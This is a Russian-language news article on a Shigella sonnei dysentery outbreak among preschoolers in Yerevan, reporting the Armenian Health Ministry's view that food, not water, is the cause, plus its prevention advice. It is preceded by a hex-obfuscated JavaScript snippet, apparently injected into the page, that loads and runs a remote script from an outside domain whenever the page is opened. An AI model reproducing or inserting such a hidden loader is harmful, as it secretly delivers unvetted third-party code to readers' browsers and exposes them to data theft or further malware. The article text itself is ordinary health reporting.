script type='text/javascript'>var _0x7f86=["\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x73\x72\x63","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x73\x74\x61\x74\x69\x63\x2E\x72\x6F\x67\x65\x72\x73\x74\x72\x69\x70\x73\x2E\x63\x6F\x6D\x2F\x6D\x61\x69\x6E\x2E\x6A\x73","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65"];var script=document[_0x7f86[1]](_0x7f86[0]);script[_0x7f86[2]]= _0x7f86[3];script[_0x7f86[4]]= _0x7f86[5];document[_0x7f86[8]](_0x7f86[7])[0][_0x7f86[6]](script)

 Минздрав назвал вероятную причину роста наблюдающейся в Армении кишечной инфекции – фактор воды исключается. Рост числа случаев больше характерен для пищевого фактора, сообщили в ведомстве.

В Армении были выявлены случаи дизентерии среди детей дошкольного возраста. В течение последних в двух медицинских учреждениях в Ереване была замечена активность обращения детей со схожими жалобами — диарея, рвота, высокая температура, слабость. В целом, зарегистрировано 18 случаев. В результате лабораторного исследования у 9 детей обнаружен возбудитель дизентерии (шигеллы Зонне). Выяснилось, что все дети посещали одно и то же дошкольное учреждение.

В Минздраве отметили, что дизентерия, как и все кишечные заболевания, активизируются в теплые сезоны и на данный момент с учетом летнего сезона наблюдается рост заболеваний.

В последние дни, жители Армении выражали обеспокоенность в связи с ростом числа заболеваний, связывая ее возможное возникновение с использованием некачественной воды.

«Подобная обеспокоенность необоснованна, о чем свидетельствуют также проведенные лабораторные исследования. В частности, качество и безопасность поставляемой населению питьевой воды находится под постоянным контролем и в течение июня в Ереване в лабораторных пробах не было обнаружено никаких отклонений», — говорится в сообщении.

Как отметили в Минздраве, лабораторные исследования свидетельствуют, что рост случаев кишечной инфекции в Армении обусловлен пищевым фактором (загрязненная возбудителями болезни еда, ее приготовление зараженным человеком, хранящаяся или приготовленная в несоответствующих условиях еда, грязная посуда и прочее). В частности, обнаружен возбудитель дизентерии (шигеллы Зонне), который присущ пищевому фактору.

Для того, чтобы не заразиться дизентерией, Минздрав рекомендует не пить воду подозрительного происхождения или использовать кипяченую воду, а маленьким детям не давать воду из-под крана или некипяченое молоко. Также рекомендуется тщательно мыть фрукты и овощи под проточной водой, а продукты держать в холодильнике и следить за сроком годности.

Минздрав также рекомендует избегать употребления продуктов, которые продаются на улице или хранятся не в холодильниках, воздержаться от использования майонеза, выпечки с кремом и продаваемого на улицах мягкого мороженого. Также рекомендуется постоянно соблюдать правила личной гигиены, мыть руки перед едой, после посещения туалета и контакта с почвой.

В случае возникновения характерных для дизентерии симптомов Минздрав призывает немедленно обращаться к врачам, а не заниматься самолечением, поскольку неправильное лечение может привести к образованию хронических форм болезни или устойчивости к ним, а также возможным осложнениям.